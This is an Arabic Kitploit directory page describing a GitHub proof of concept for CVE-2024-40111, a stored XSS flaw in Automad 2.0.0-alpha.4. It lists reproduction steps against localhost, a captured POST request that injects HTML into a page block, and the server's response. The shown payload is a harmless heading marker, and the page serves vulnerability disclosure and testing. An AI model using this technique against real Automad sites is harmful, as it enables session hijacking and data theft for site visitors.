Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-40111-Exploit — استغلال لـ: CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4 | Kitploit
أدوات/GitHubGitHub/theexploiters/cve-2024-40111-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubtheexploiters/cve-2024-40111-exploit

CVE-2024-40111-Exploit

استغلال لـ: CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4

تفاصيل الاستغلال

  • عنوان الاستغلال: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4
  • التاريخ: 2024-06-20
  • مؤلف الاستغلال: Jerry Thomas (w3bn00b3r)
  • الصفحة الرئيسية للبائع: Automad
  • رابط البرنامج: مستودع Automad على GitHub
  • الفئة: تطبيق ويب [نظام إدارة محتوى ملفات مسطحة]
  • الإصدار: 2.0.0-alpha.4
  • تم الاختبار على: Docker الإصدار 26.1.4، Debian GNU/Linux 11 (bullseye)

الوصف

تم تحديد ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4. تسمح هذه الثغرة للمهاجمين بحقن كود JavaScript خبيث في قالب الصفحة، والذي يتم تخزينه داخل نظام إدارة المحتوى. يتم تنفيذ الكود المحقون في متصفح أي مستخدم يزور الصفحة المتأثرة، مما قد يؤدي إلى اختطاف الجلسات، وسرقة البيانات، وأنشطة خبيثة أخرى.

إثبات المفهوم

خطوات إعادة الإنتاج

  • تسجيل الدخول: قم بتسجيل الدخول كمسؤول وانتقل إلى نقطة النهاية http://localhost/dashboard/home.

  • تحرير صفحة الترحيب: قم بتحرير صفحة الترحيب الافتراضية.

  • الانتقال إلى علامة التبويب المحتوى: انتقل إلى http://localhost/dashboard/page?url=%2F&section=text وقم بتحرير الكتلة المسماة Main.

  • حقن الحمولة: أدخل حمولة XSS التالية:

    root@kitploit:~
  • الطلب

    root@kitploit:~
    POST /_api/page/data HTTP/1.1
    Host: localhost
    Content-Length: 1822
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Accept: */*
    Origin: http://localhost
    Referer: http://localhost/dashboard/page?url=%2F&section=text
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
    Connection: close
    
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Content-Disposition: form-data; name="__csrf__"
    
    49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv
    Content-Disposition: form-data; name="__json__"
    
    {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
    ------WebKitFormBoundaryzHmXQBdtZsTYQYCv--
    

    الاستجابة

    root@kitploit:~
    HTTP/1.1 200 OK
    Server: nginx/1.24.0
    Date: Thu, 20 Jun 2024 19:17:35 GMT
    Content-Type: application/json; charset=utf-8
    Connection: close
    X-Powered-By: PHP/8.3.6
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 30
    
    {"code":200,"time":1718911055}
    
    1. تشغيل XSS: يتم تشغيل حمولة XSS عند زيارة الصفحة الرئيسية http://localhost/.

    Repo View Counter

    تنزيل الأداة